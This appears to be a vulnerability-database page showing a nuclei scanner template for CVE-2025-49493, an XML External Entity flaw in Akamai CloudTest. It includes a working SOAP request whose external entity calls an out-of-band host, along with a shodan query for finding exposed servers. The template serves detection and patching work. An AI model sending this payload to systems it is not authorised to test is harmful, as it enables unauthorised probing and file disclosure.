Lucene search
K

Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Akamai CloudTest before 60 2025.06.02 allows XML External Entity injection leading to file inclusion.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-49493
14 Jul 202502:05
githubexploit
GithubExploit
Exploit for CVE-2025-49493
5 Jul 202513:32
githubexploit
BDU FSTEC
The vulnerability of the Akamai CloudTest performance testing platform lies in the improper limitation of XML links to external objects, which allows attackers to compromise privacy.
9 Jul 202500:00
bdu_fstec
Circl
CVE-2025-49493
30 Jun 202519:42
circl
CNNVD
Akamai CloudTest 代码问题漏洞
30 Jun 202500:00
cnnvd
CVE
CVE-2025-49493
30 Jun 202500:00
cve
Cvelist
CVE-2025-49493
30 Jun 202500:00
cvelist
EUVD
EUVD-2025-19583
3 Oct 202520:07
euvd
NVD
CVE-2025-49493
30 Jun 202520:15
nvd
Packet Storm News
Akamai CloudTest XML Injection
14 Jul 202500:00
packetstormnews
Rows per page
id: CVE-2025-49493

info:
  name: Akamai CloudTest < 60 2025.06.02 - XML External Entity (XXE)
  author: xbow,3th1c_yuk1
  severity: critical
  description: |
    Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
  impact: |
    Unauthenticated attackers can exploit XXE injection to read arbitrary files from the server through malicious XML entities in SOAP requests.
  remediation: |
    Upgrade Akamai CloudTest to version 60 2025.06.02 (12988) or later that properly disables external entity processing.
  reference:
    - https://xbow.com/blog/xbow-akamai-cloudtest-xxe/
    - https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49493
  classification:
    epss-score: 0.03395
    epss-percentile: 0.87382
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-49493
    cwe-id: CWE-611
    cpe: cpe:2.3:a:akamai:cloudtest:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Akamai CloudTest"
    vendor: akamai
    product: cloudtest
  tags: cve,cve2025,akamai,cloudtest,xxe,oast,rce,vkev,vuln

http:
  - raw:
      - |
        POST /concerto/services/RepositoryService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/html
        SOAPAction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE soapenv:Envelope [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:rep="http://example.com/services/repository">
           <soapenv:Header/>
           <soapenv:Body>
              <rep:getUIBundleObjectXml>
                 <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
              </rep:getUIBundleObjectXml>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "XML stream")'
        condition: and
# digest: 490a0046304402203c5d9bb1312d2140ce10b33b7783f8734b2a1323eb500137be96777732e8b25b02206f188daf053f480ef13bc57637424a4d6df3619f05706b824bbe114d5cdabc1c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.15.8
EPSS0.03395
SSVC
30